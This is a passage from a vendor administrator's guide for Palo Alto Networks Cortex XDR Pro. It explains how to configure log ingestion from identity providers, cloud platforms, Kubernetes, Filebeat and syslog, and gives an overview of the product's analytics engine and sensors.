• Create an application secret: https://docs.microsoft.com/en-us/azure/active-directory/develop/
howto-create-service-principal-portal#create-a-new-application-secret

STEP 2 |
Select > Settings > SaaS Log Collection.

STEP 3 | Integrate the Microsoft Azure AD authentication service with Cortex XDR.
1. Enter the Tenant Domain of your Microsoft Azure AD tenant.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 367

© 2020 Palo Alto Networks, Inc.
 2. Obtain the Application Client ID and Secret for your Azure AD service from the Microsoft Azure
Console and enter the values in Cortex XDR.
These values enable Cortex XDR to authenticate with your Azure AD service.
3. Select the types of logs that you want to receive from your Azure AD service.
Options are Authentication Logs and Audit Logs. By default, both options are enabled.
4. Test the connection settings.
To test the connection, you must select one or both log types. Cortex XDR then tests the connection
settings for the selected log types.
5. If successful, Enable Azure AD log collection.

STEP 4 | After Cortex XDR begins receiving logs, you can return to the SaaS Log Collection page to view
the log collection status.
If you set up Cortex XDR to receive both authentication and audit logs, the events total includes both
log types.

STEP 5 | As part of your investigation flows, create queries when needed to search for specific Azure
AD logs.
See Create an Authentication Query (authentication logs only) or Create an XQL Query.

Ingest Authentication Logs and Data from Okta

Ingesting external logs and data requires a Cortex XDR Pro per TB license.

To receive authentication logs and data from Okta, you must first configure the SaaS Log Collection
settings in Cortex XDR. After you set up log collection, Cortex XDR immediately begins receiving new
authentication logs and data from the source. The information from Okta is then searchable in Cortex XDR
and can be included in authentication stories.

STEP 1 | Identify the domain name of your Okta service.

From the Dashboard of your Okta console, note your Org URL.
For more information, see the Okta Documentation.

STEP 2 | Obtain your authentication token in Okta.

368 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 1. Select API > Tokens.
2. Create Token and record the token value.
This is your only opportunity to record the value.

STEP 3 |
Select > Settings > SaaS Log Collection.

STEP 4 | Integrate the Okta authentication service with Cortex XDR.

1. Enter the OKTA DOMAIN (Org URL) that you identified on your Okta console.
2. Enter the TOKEN used to authenticate with Okta.
3. Test the connection settings.
4. If successful, Enable Okta log collection.

STEP 5 | After Cortex XDR begins receiving information from the authentication service, you can Create
an Authentication Query or use Native Search to search for specific authentication data.

Ingest Authentication Logs from PingFederate

Ingesting Authentication Logs requires a Cortex XDR Pro per TB license.

To receive authentication logs from PingFederate, you must first write Audit and Provisioner Audit Logs
to CEF in PingFederate and then configure the SaaS Log Collection settings in Cortex XDR. After you
set up log collection, Cortex XDR immediately begins receiving new authentication logs from the source.
Cortex XDR creates a dataset named ping_identity_pingfederate_raw. Logs from PingFederate are
searchable in XQL queries using the dataset and surfaced, when relevant, in authentication stories.

STEP 1 | Activate the Syslog Collector.

STEP 2 | Set up PingFederate to write logs in CEF.

To set up integration, you must have an account for the PingFederate management dashboard and
access to create a subscription for SSO logs.
In your PingFederate deployment, write audit logs in CEF. During this set up you will need the IP address
and port you configured in the Syslog Collector.

STEP 3 |
Select > Settings > SaaS Log Collection.

STEP 4 | Connect Cortex XDR to your PingFederate for Enterprise authentication service.
1. Enter your PingFederate ACCOUNT ID.
2. Enter your PingFederate SUBSCRIPTION ID.
3. Enter your PingFederate USER NAME.
4. Enter your PingFederate PASSWORD.
5. Test the connection settings.
6. If successful, Enable PingFederate authentication log collection.
After configuration is complete, Cortex XDR begins receiving logs from the authentication service. From
the SaaS Log Collection page, you can view the log collection summary.

STEP 5 | To search for specific authentication logs or data, you can Create an Authentication Query or
use the XQL Search.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 369

© 2020 Palo Alto Networks, Inc.
Ingest Authentication Logs and Data from PingOne
Ingesting Authentication Logs and Data requires a Cortex XDR Pro per TB license.

To receive authentication logs and data from PingOne for Enterprise, you must first set up a Poll
subscription in PingOne and then configure the SaaS Log Collection settings in Cortex XDR. After you set
up log collection, Cortex XDR immediately begins receiving new authentication logs and data from the
source. These logs and data are then searchable in Cortex XDR.

STEP 1 | Set up PingOne for Enterprise to send logs and data.

To set up integration, you must have an account for the PingOne management dashboard and access to
create a subscription for SSO logs.
From the PingOne Dashboard:
1. Set up a Poll subscription.
1. Select Reporting > Subscriptions > Add Subscription.
2. Enter a NAME for the subscription.
3. Select Poll as the subscription type.
4. Leave the remaining defaults and select Done.
2. Identify your account ID and subscription ID.
1. Select the subscription you just set up and note the part of the poll URL between /reports/ and /
poll-subscriptions. This is your PingOne account ID.
For example:
https://admin-api.pingone.com/v3/reports/1234567890asdfghjk-123456-
zxcvbn/poll-subscriptions/***-0912348765-4567-98012***/events
In this URL, the account ID is 1234567890asdfghjk-123456-zxcvbn.
2. Next, note the part of the poll URL between /poll-subscriptions/ and /events. This is your
subscription ID.
In the example above, the subscription ID is ***-0912348765-4567-98012***.

STEP 2 |
Select > Settings > SaaS Log Collection.

STEP 3 | Connect Cortex XDR to your PingOne for Enterprise authentication service.
1. Enter your PingOne ACCOUNT ID.
2. Enter your PingOne SUBSCRIPTION ID.
3. Enter your PingOne USER NAME.
4. Enter your PingOne PASSWORD.
5. Test the connection settings.
6. If successful, Enable PingOne authentication log collection.
After configuration is complete, Cortex XDR begins receiving information from the authentication
service. From the SaaS Log Collection page, you can view the log collection summary.

STEP 4 | To search for specific authentication logs or data, you can Create an Authentication Query or
use the Native Search.

370 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Ingest Operation and System Logs from Cloud
Providers
• Ingest Logs from AWS CloudTrail and Amazon CloudWatch
• Ingest Logs from Google Kubernetes Engine
• Ingest Logs and Data from a GCP Pub/Sub

Ingest Logs from AWS CloudTrail and Amazon CloudWatch

Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use AWS CloudTrail or Amazon CloudWatch, you can forward logs for the relative service to Cortex
XDR. To enable log forwarding you set up Amazon Kinesis Firehose and then add that to your AWS
CloudTrail or Amazon CloudWatch configuration. After you complete the set up process, logs from the
respective service are then searchable in Cortex XDR to provide additional information and context to your
investigations.
To set up AWS integration you need the following permissions in AWS you need a role that enables access
to configuring Amazon Kinesis Firehose.

STEP 1 | Set up the AWS integration in Cortex XDR.

1.
Select > Settings > SaaS Integrations.
2. In the AWS configuration, click the here link to begin a new configuration.

3. Enter a descriptive Name for your log collection configuration.

4. Enter the Vendor and Product for the type of logs you are ingesting.
The vendor and product are used to define the name of your XQL dataset
(<vendor>_<product>_raw). If you do not define a vendor or product, Cortex XDR uses the
default values of Amazon and AWS with the resulting dataset name as amazon_aws_raw. To
uniquely identify the log source, consider changing the values.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 371

© 2020 Palo Alto Networks, Inc.
 5. Choose the format of the data input source (CloudTrail or CloudWatch) that you will export to Cortex
XDR, either JSON or Text.
6. Save & Generate Token.
Click the copy icon next to the key and record it somewhere safe. You will need to provide this key
when you set up output settings in AWS Kinesis Firehose. If you forget to record the key and close
the window you will need to generate a new key and repeat this process.

7. Select Done to close the window.

STEP 2 | Create a Kinesis Data Firehose delivery stream to your chosen destination.
1. Log in to the AWS Management Console, and open the Kinesis console at https://
console.aws.amazon.com/kinesis.
2. Select Data Firehose > Create delivery stream.

3. Define the name and source for your stream.

• Delivery stream name—Enter a descriptive name for your stream configuration.
• Source—Select Direct PUT or other sources.
• Server-side encryption for source records in the delivery stream—Ensure this option is disabled.
Click Next to proceed to the process record configuration.
4. Define the process records.
• Transform source records with AWS Lambda—Set the Data Transformation as Disabled.
• Convert record format—Set Record format conversion as Disabled.
Click Next to proceed to the destination configuration.
5. Choose a destination for the logs.
Choose HTTP Endpoint as the destination and configure the HTTP endpoint configuration settings:
• HTTP endpoint name—Enter the name you used to identify your AWS log collection configuration
in Cortex XDR.

372 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 • HTTP endpoint URL—Copy the API URL associated with your log collection from the Cortex XDR
management console ( > Settings > SaaS Integrations > Copy API URL. The URL will include
your tenant name (https://api-<tenant external URL>/logs/v1/aws).
• Access key—Paste in the token key you recorded earlier during the configuration of your Cortex
XDR log collection settings.
• Content encoding—Select GZIP. Disabling content encoding may result in high egress costs.
• Retry duration—Enter 300 seconds.
• S3 bucket—Set the S3 backup mode as Failed data only. For the S3 bucket, we recommend that
you create a dedicated bucket for Cortex XDR integration.
Click Next to proceed to the settings configuration.
6. Configure additional settings.
• HTTP endpoint buffer conditions—Set the Buffer size as 1 MiB and the Buffer interval as 60
seconds.
• S3 buffer conditions—Use the default settings for Buffer size as 5 MiB and Buffer interval as 300
seconds unless you have alternative sizing preferences.
• S3 compression and encryption—Choose your desired compression and encryption settings.
• Error logging—Select Enabled.
• Permissions—Create or update IAM role. option
Select Next.
7. Review your configuration and Create delivery stream.
When your delivery stream is ready, the status changes from Creating to Active.

STEP 3 | To begin forwarding logs, add the Kinesis Firehose instance to your AWS CloudTrail or Amazon
CloudWatch configuration.
To do this, you add a subscription filter for Amazon Kinesis Firehose. See https://docs.aws.amazon.com/
AmazonCloudWatch/latest/logs/SubscriptionFilters.html.

STEP 4 | Verify the status of the integration.

Return to the SaaS Integrations page and view the statistics for the log collection configuration.

STEP 5 | After Cortex XDR begins receiving logs from your Amazon services, you can use the XQL
Search to search for logs in the new dataset.

Ingest Logs and Data from a GCP Pub/Sub

Ingesting logs and data requires a Cortex XDR Pro per TB license.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 373

© 2020 Palo Alto Networks, Inc.
 If you use the Pub/Sub messaging service from Global Cloud Platform (GCP), you can send logs and data
from your GCP instance to Cortex XDR. Data from GCP is then searchable in Cortex XDR to provide
additional information and context to your investigations.
To receive logs and data from GCP, you must first set up log forwarding using a Pub/Sub topic in GCP. You
can configure GCP settings using either the GCP web interface or a GCP cloud shell terminal. After you set
up your service account in GCP, you configure the SaaS Log Collection settings in Cortex XDR. The setup
process requires the subscription name and authentication key from your GCP instance.
After you set up log collection, Cortex XDR immediately begins receiving new logs and data from GCP.
• Set up Log Forwarding Using the GCP Web Interface
• Set up Log Forwarding Using the GCP Cloud Shell Terminal

Set up Log Forwarding Using the GCP Web Interface

STEP 1 | Log in to your GCP account.

STEP 2 | Set up log forwarding from GCP to Cortex XDR:

1. Select Logging > Logs Router.
2. Select Create Sink > Cloud Pub/Sub topic and then click Next.
3. To filter only specific types of data, select the filter or desired resource.
4. In the Edit Sink configuration, define a descriptive Sink Name.
5. Select Sink Destination > Create new Cloud Pub/Sub topic.
6. Enter a descriptive Name that identifies the sink purpose for Cortex XDR, and then Create.
7. Create Sink and then Close when finished.

STEP 3 | Create a subscription for your Pub/Sub topic.

1. Select the hamburger menu in G Cloud and then select Pub/Sub > Topics.
2. Select the name of the topic you created in the previous steps. Use the filters if necessary.
3. Create Subscription > Create subscription.
4. Enter a unique Subscription ID.
5. Choose Pull as the Delivery Type.
6. Create the subscription.
After the subscription is set up, G Cloud displays statistics and settings for the service.
7. In the subscription details, identify and note your Subscription Name.
Optionally, use the copy button to copy the name to the clipboard. You will need the name when you
configure SaaS Collection in Cortex XDR.

STEP 4 | Create a service account and authentication key.

You will use the key to enable Cortex XDR to authenticate with the subscription service.
1. Select the hamburger menu and then select IAM & Admin > Service Accounts.
2. Create Service Account.
3. Enter a Service account name and then Create.
4. Select a role for the account: Pub/Sub > Pub/Sub Subscriber.
5. Click Continue > Done.
6. Locate the service account by name, using the filters to refine the results, if needed.
7. Click the Actions menu identified by the three dots in the row for the service account and then
Create Key.
8. Select JSON as the key type, and then Create.

374 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 After you create the service account key, G Cloud automatically downloads it.

STEP 5 | In Cortex XDR, set up SaaS Log Collection.

1.
Select > Settings > SaaS Log Collection.
2. In the Google Cloud Platform configuration, click the here link.

3. Enter the Subscription Name that you previously noted or copied.

4. Browse to the JSON file containing your authentication key for the service account.
5. Test the provided settings and, if successful, proceed to Enable log collection.

STEP 6 | After Cortex XDR begins receiving information from the GCP Pub/Sub service, you can use the
XQL Query language to search for specific data.

Set up Log Forwarding Using the GCP Cloud Shell Terminal

STEP 1 | Launch the GCP cloud shell terminal or use your preferred shell with gcloud installed.

STEP 2 | Define your project ID.

gcloud config set project <PROJECT_ID>

STEP 3 | Create a Pub/Sub topic.

gcloud pubsub topics create <TOPIC_NAME>

STEP 4 | Create a subscription for this topic.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 375

© 2020 Palo Alto Networks, Inc.
 gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic=<TOPIC_NAME>

Note the subscription name you define in this step as you will need it to set up log ingestion from Cortex
XDR.

STEP 5 | Create a logging sink.

During the logging sink creation, you can also define additional log filters to exclude specific logs. To
filter logs, supply the optional parameter --log-filter=<LOG_FILTER>

gcloud logging sinks create <SINK_NAME> pubsub.googleapis.com/

projects/<PROJECT_ID>/topics/<TOPIC_NAME> --log-filter=<LOG_FILTER>

If setup is successful, the console displays a summary of your log sink settings:

Created [https://logging.googleapis.com/v2/projects/
PROJECT_ID/sinks/SINK_NAME]. Please remember to grant
`serviceAccount:LOGS_SINK_SERVICE_ACCOUNT` \ the Pub/Sub Publisher role
on the topic. More information about sinks can be found at /logging/docs/
export/configure_export

STEP 6 | Grant log sink service account to publish to the new topic
Note the serviceAccount name from the previous step and use it to define the service for which you
want to grant publish access.

gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> --member

serviceAccount:<LOGS_SINK_SERVICE_ACCOUNT> --role=roles/pubsub.publisher

STEP 7 | Create a service account.

For example, use cortex-xdr-sa as the service account name and Cortex XDR Service Account as the
display name.

gcloud iam service-accounts create <SERVICE_ACCOUNT> --

description="<DESCRIPTION>" --display-name="<DISPLAY_NAME>"

STEP 8 | Grant the IAM role to the service account.

gcloud pubsub subscriptions add-iam-policy-binding <SUBSCRIPTION_NAME> --

member serviceAccount:<SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com
--role=roles/pubsub.subscriber

STEP 9 | Create a JSON key for the service account.

You will need the JSON file to enable Cortex XDR to authenticate with the GCP service. Specify the file
destination and filename using a .json extension.

gcloud iam service-accounts keys create <OUTPUT_FILE> --iam-

account <SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com

STEP 10 | In Cortex XDR, set up SaaS Log Collection.

376 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 1.
Select > Settings > SaaS Log Collection.
2. In the Google Cloud Platform configuration, click the here link.

3. Enter the Subscription Name that you previously noted or copied.

4. Browse to the JSON file containing your authentication key for the service account.
5. Test the provided settings and, if successful, proceed to Enable log collection.

STEP 11 | After Cortex XDR begins receiving information from the GCP Pub/Sub service, you can use
the XQL Query language to search for specific data.

Ingest Logs from Google Kubernetes Engine

Ingesting logs and data requires a Cortex XDR Pro per TB license.

Instead of forwarding Google Kubernetes Engine (GKE) logs directly to Google StackDrive, Cortex XDR can
ingest container logs from GKE using Elasticsearch* Filebeat. To receive logs, you must install Filebeat on
your containers and enable SaaS Log Collection settings for Filebeat.
After Cortex XDR begins receiving logs, the app automatically creates an XQL dataset using the vendor and
product name that you specify during Filebeat setup. It is recommended to specify a descriptive name. For
example, if you specify google as the vendor and kubernetes as the product, the dataset name will be
google_kubernetes_raw. If you leave the product and vendor blank, Cortex XDR assigns the dataset a
name of container_container_raw.
After Cortex XDR creates the dataset, you can search your GKE logs using XQL Search.

STEP 1 | Install Filebeat on your containers.

For more information, see https://www.elastic.co/guide/en/beats/filebeat/current/running-on-
kubernetes.html.

STEP 2 | Ingest Logs from Elasticsearch Filebeat.

Record your token key and API URL for the Filebeat Collector instance as you will need these later in
this workflow.

STEP 3 | Deploy a Filebeat as a DaemonSet on Kubernetes.

This ensures there is a running instance of Filebeat on each node of the cluster.
1. Download the manifest file to a location where you can edit it.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 377

© 2020 Palo Alto Networks, Inc.
 curl -L -O https://raw.githubusercontent.com/elastic/beats/7.10/deploy/
kubernetes/filebeat-kubernetes.yaml
2. Open the YAML file in your preferred text editor.
3. Remove the cloud.id and cloud.auth lines.

4. For the output.elasticsearch configuration, replace the hosts, username, and password
with environment variable references for hosts and api_key, and add a field and value for
compression_level and bulk_max_size.

5. In the DaemonSet configuration, locate the env configuration and replace ELASTIC_CLOUD_AUTH,
ELASTIC_CLOUD_ID, ELASTICSEARCH_USERNAME, ELASTICSEARCH_PASSWORD,
ELASTICSEARCH_HOST, ELASTICSEARCH_PORT and their relative values with the following:
• ELASTICSEARCH_ENDPOINT—Enter the API URL for your Cortex XDR tenant. You can copy
the URL from the Filebeat Collector instance you set up for GKE in the Cortex XDR management
console ( > Settings > SaaS Integrations > Copy API URL. The URL will include your tenant
name (https://api-<tenant external URL>:443/logs/v1/filebeat)

378 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 • ELASTICSEARCH_API_KEY—Enter the token key you recorded earlier during the configuration
of your Filebeat Collector instance.
After you configure these settings your configuration should look like the following image.

6. Save your changes.

STEP 4 | If you use RedHat OpenShift, you must also specify additional settings.
See https://www.elastic.co/guide/en/beats/filebeat/7.10/running-on-kubernetes.html.

STEP 5 | Deploy Filebeat on your Kubernetes.

kubectl create -f filebeat-kubernetes.yaml

This will deploy Filebeat in the kube-system namespace. If you want to deploy the Filebeat configuration
in other namespaces, change the namespace values in the YAML file (in any YAML inside this file) and
add -n <your_namespace>.
After you deploy your configuration, the Filebeat DameonSet will run throughout your containers to
forward logs to Cortex XDR. You can review the configuration from the Kubernetes Engine console:
Workloads > Filebeat > YAML.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 379

© 2020 Palo Alto Networks, Inc.
STEP 6 | After Cortex XDR begins receiving logs from GKE, you can use the XQL Search to search for
logs in the new dataset.

Elasticsearch is a trademark of Elasticsearch B.V., registered in the U.S. and in other countries.

380 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Additional Log Ingestion Methods for Cortex
XDR
• Ingest Logs from a Syslog Receiver
• Ingest Logs from Elasticsearch Filebeat

Ingest Logs from a Syslog Receiver

Ingesting logs and data requires a Cortex XDR Pro per TB license.

Cortex XDR can receive Syslog from a variety of supported vendors (see External Data Ingestion Vendor
Support). In addition, Cortex XDR can receive Syslog from additional vendors that use CEF or LEEF
formatted over Syslog (TLS not supported).
After Cortex XDR begins receiving logs from the third-party source, Cortex XDR automatically parses the
logs in LEEF format and creates a dataset with the name <vendor>_<product>_raw. You can then use
XQL Search queries to view logs and create new IOC or BIOC rules.
To receive Syslog from an external source:

STEP 1 | Set up your Syslog receiver to forward logs.

STEP 2 | Activate the Syslog Collector applet on a Broker VM within your network.

STEP 3 | Use the XQL Search to search your logs.

Ingest Logs from Elasticsearch Filebeat

If you want to ingest logs about file activity on your endpoints and servers and do not use the Cortex XDR
agent, you can install Elasticsearch* Filebeat as a system logger and then forward those logs to Cortex XDR.
To facilitate log ingestion, Cortex XDR supports the same protocols that Filebeat and Elasticsearch use to
communicate.
To provide additional context during investigations, Cortex XDR automatically creates a new XQL dataset
from your Filebeat logs. You can then use the XQL dataset to search across the logs Cortex XDR received
from Filebeat.
To receive logs, you configure collection settings for Filebeat in Cortex XDR and output settings in your
Filebeat installations. As soon as Cortex XDR begins receiving logs, the data is visible in XQL Search queries.

STEP 1 | In Cortex XDR, set up Log Collection.

1.
Select > Settings > Custom Collections.
2. In the Filebeat configuration, click the here link.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 381

© 2020 Palo Alto Networks, Inc.
 3. Enter a descriptive Name for your Filebeat log collection configuration.
4. Enter the Vendor and Product for the type of logs you are ingesting.
The vendor and product are used to define the name of your XQL dataset
(<vendor>_<product>_raw). If you do not define a vendor or product, Cortex XDR examines the
log header to identify the type and uses that to define the vendor and product in the dataset. For
example, if the type is Acme and you opt to let Cortex XDR determine the values, the dataset name
would be acme_acme_raw.
5. Save & Generate Token.
Click the copy icon next to the key and record it somewhere safe. You will need to provide this key
when you set up output settings on your Filebeat instance. If you forget to record the key and close
the window you will need to generate a new key and repeat this process.

STEP 2 | Set up Filebeat to forward logs.

After installing the Filebeat agent, configure an Elasticsearch output:
1. Under the output.elasticsearch section, configure the following entities:

382 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 • hosts—Copy the API URL from your Filebeat configuration and paste it in this field.

• compression level—5 (recommended)

• bulk_max_size—1000 (recommended)
• API Key—Paste the key you created in when you configured Filebeat Log Collection in Cortex
XDR.
2. Save the changes to your output file.
After Cortex XDR begins receiving logs from Filebeat, they will be available in XQL Search queries.

STEP 3 | (Optional) Monitor your Filebeat integration.

You can return to the > Settings > Custom Collections page to monitor the status of your Filebeat
configuration. For each instance, Cortex XDR displays the number of logs received in the last hour, day,
and week. You can also use the Data Ingestion Dashboard to view general statistics about your data
ingestion configurations.

STEP 4 | (Optional) Set up alert notifications to monitor the following events:

• A Filebeat agent status changes to disconnected.
• A Filebeat module has stopped sending logs.

Elasticsearch is a trademark of Elasticsearch B.V., registered in the U.S. and in other countries.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 383

© 2020 Palo Alto Networks, Inc.
Ingest External Alerts
For a more complete and detailed picture of the activity involved in an incident, Cortex XDR can ingest
alerts from any external source. Cortex XDR stitches the external alerts together with relevant endpoint
data and displays alerts from external sources in relevant incidents and alerts tables. You can also see
external alerts and related artifacts and assets in Causality views.
To ingest alerts from an external source, you configure your alert source to forward alerts (in CEF, LEEF,
CISCO, or CORELIGHT format) to the syslog collector. You can also ingest alerts from external sources
using the Cortex XDR API.
After Cortex XDR begins receiving external alerts, you must map the following required fields to the Cortex
XDR format:
• Timestamp
• Severity
• Source IP address
• Source port
• Destination IP address
• Destination port

If you send pre-parsed alerts using the Cortex XDR API, additional mapping is not required.

Storage of external alerts is determined by your Cortex Data Lake data retention policy.
To ingest external alerts:

STEP 1 | Send alerts from an external source to Cortex XDR.

There are two ways to send alerts:
• Cortex XDR API—Use the insert_cef_alerts API to send the raw syslog alerts or use the
insert_parsed_alerts API to convert the syslog alerts to the Cortex XDR format before sending them
to Cortex XDR. If you use the API to send logs, you do not need to perform the additional mapping
step in Cortex XDR.
• Activate Syslog collector—Activate the syslog collector and then configure the alert source to
forward alerts to the syslog collector. Then configure an alert mapping rule as follows.

STEP 2 |
In Cortex XDR, select > Settings > External Alerts.

STEP 3 | Right-click the Vendor Product for your alerts and select Filter and Map.

384 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
STEP 4 | Use the filters at the top of the table to narrow the results to only the alerts you want to map.
Cortex XDR displays a limited sample of results during the mapping rule creation. As you define your
filters, Cortex XDR applies the filter to the limited sample but does not apply the filters across all alerts.
As a result, you might not see any results from the alert sample during the rule creation.

STEP 5 | Click Next to begin a new mapping rule.

1. On the left, define a Name and optional Description to identify your mapping rule.
2. Map each required Cortex XDR field to a field in your alert source.

If needed, use the field converter ( ) to translate the source field to the Cortex XDR syntax.
For example, if you use a different severity system, you need to use the converter to map your
severities fields to the Cortex XDR risks of High, Medium, and Low.
You can also use regex to convert the fields to extract the data to facilitate matching with the Cortex
XDR format. For example, say you need to map the port but your source field contains both IP
address and port (192.168.1.200:8080). To extract everything after the :, use the following
regex:
^[^:]*_
For additional context when you are investigating an incident, you can also map additional optional
fields to fields in your alert source.

STEP 6 | Submit your alert filter and mapping rule when finished.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 385

© 2020 Palo Alto Networks, Inc.
386 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion
Analytics
> Analytics Concepts

387
388 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics
© 2020 Palo Alto Networks, Inc.
Analytics Concepts
Network security professionals know that safeguarding a network requires a defense-in-depth strategy.
This layered approach to network security means ensuring that software is always patched and current,
while running hardware and software systems that are designed to keep attackers out. Many strategies
exist to keep unwanted users out of a network, most of these work by stopping intrusion attempts at the
network perimeter.
As good and necessary as those strategies and products are, they all can defend only against known threats.
Systems that looks for malicious software, for example, traditionally do its work based on previously
identified MD5 signatures. But authors of these viruses constantly make trivial modifications to these
signatures of the virus to avoid virus scanners until their MD5 database is updated with the modified and
newly discovered signatures.
In other words, defensive network systems are constantly trying to keep up with the best efforts of
aggressive, nimble attackers. Your defensive network software must be 100% correct 100% of the time to
prevent successful attacks. A determined attacker, on the other hand, must be successful only once to ruin
your day.
Consequently, your network defense-in-depth strategy must include software and processes that are
designed to detect and respond to an intruder who has successfully penetrated your systems. This is the
position that Cortex XDR takes in your enterprise. The app efficiently and automatically identifies abnormal
activity on your network while providing you with the exact information you need to rapidly evaluate
potential threats and then isolate and remove those threats from your network before they can perform
real damage.
• Analytics Engine
• Analytics Sensors
• Coverage of the MITRE Attack Tactics
• Analytics Detection Time Intervals
• Analytics Alerts and Analytics BIOCs

Analytics Engine
The Cortex XDR™ app uses an analytics engine to examine logs and data from your sensors. The analytics
engine retrieves logs from Cortex Data Lake to understand the normal behavior (creates a baseline) so
that it can raise alerts when abnormal activity occurs. The analytics engine accesses your logs as they are
streamed to Cortex Data Lake and analyzes the data as soon as it arrives. Cortex XDR raises an Analytics
alert when the analytics engine determines an anomaly.
The analytics engine is built to process—in parallel—large amounts of data stored in Cortex Data Lake. The
ultimate goal is to identify normal behavior so the Cortex apps can recognize and use alerts to notify you
of that abnormal behavior. The analytics engine can examine traffic and data from a variety of sources
such as network activity from firewall logs, VPN logs (from Prisma Access from the Panorama plugin),
endpoint activity data (on Windows endpoints), Active Directory or a combination of those sources, to
identify endpoints and users on your network. After endpoints and users are identified, the analytics engine
collects relevant details about every asset that it sees based on the information it obtains from the logs.
The analytics engine can detect threats from only network data or only endpoint data, but for more context
when investigating an alert, a combination of data sources are recommended.
The list of what the engine looks for is large, varied, and constantly growing but, as a consequence of this
analysis, the analytics engine is able to build profiles about every endpoint and user of which it knows
about. Profiles allow the engine to put the activity of the endpoint or user in context by comparing it against
similar endpoints or users. The analytics engine creates and maintains a very large number of profile types
but, generally, they can all be placed into three categories.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics 389

© 2020 Palo Alto Networks, Inc.
Analytics Sensors
To detect anomalous behavior, Cortex XDR can analyze logs and data from a variety of sensors.

Sensor Description

Palo Alto Networks sensors

Firewall traffic logs Palo Alto Networks Firewalls perform traditional and
next-generation firewall activities. The Cortex XDR
analytics engine can analyze Palo Alto Networks firewall
logs to obtain intelligence about the traffic on your
network. A Palo Alto Networks firewall can also enforce
Security policy based on IP addresses and domains
associated with Analytics alerts with external dynamic
lists.

Enhanced application logs (EAL) To provide greater coverage and accuracy, you can
enable enhanced application logging on your Palo Alto
Networks firewalls. EAL are collected by the firewall
to increase visibility into network activity for Palo Alto
Networks apps and services, like Cortex XDR. Only
firewalls sending logs to Cortex Data Lake can generate
enhanced application logs.
Examples of the types of data that enhanced application
logs gather includes records of DNS queries, the HTTP
header User Agent field that specifies the web browser
or tool used to access a URL, and information about
DHCP automatic IP address assignment. With DHCP
information, for example, Cortex XDR can alert on
unusual activity based on hostname instead of IP
address. This allows the security analyst using Cortex
XDR to meaningfully assess whether the user’s activity
is within the scope of his or her role, and if not, to more
quickly take action to stop the activity.

GlobalProtect and Prisma Access logs If you use GlobalProtect or Prisma Access to extend
your firewall security coverage to your mobile users,
Cortex XDR can also analyze VPN traffic to detect
anomalous behavior on mobile endpoints.

Firewall URL logs (part of firewall threat logs) Palo Alto Networks firewalls can log Threat log entries
when traffic matches one of the Security Profiles
attached to a security rule on the firewall. Cortex XDR
can analyze entries for Threat logs relating to URLs and
raise alerts that indicate malicious behavior such as
command and control and exfiltration.

Cortex XDR agent endpoint data With a Cortex XDR Pro per Endpoint license, you can
deploy Cortex XDR agents on your endpoints to protect
them from malware and software exploits. The analytics
engine can also analyze the EDR data collected by the
Cortex XDR agent to raise alerts. To collect EDR data,

390 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics

© 2020 Palo Alto Networks, Inc.
 Sensor Description
you must install Cortex XDR agent 6.0 or a later release
on your Windows endpoints (Windows 7 SP1 or later).
The Cortex XDR analytics engine can analyze activity
and traffic based solely on endpoint activity data sent
from Cortex XDR agents. For increased coverage and
greater insight during investigations, use a combination
of Cortex XDR agent data and firewalls to supply
activity logs for analysis.

Pathfinder data collector In a firewall-only deployment where the Cortex XDR

agent is not installed on your endpoints, you can
use of Pathfinder to monitor endpoints. Pathfinder
scans unmanaged hosts, servers, and workstations
for malicious activity. The analytics engine can also
analyze Pathfinder the data collector in combination
with other data sources to increase coverage of your
network and endpoints, and to provide more context
when investigating alerts.

Directory Sync logs If you use the Directory Sync service to provide Cortex
XDR with Active Directory data, the analytics engine
can also raise alerts on your Active Directory logs.

External sensors
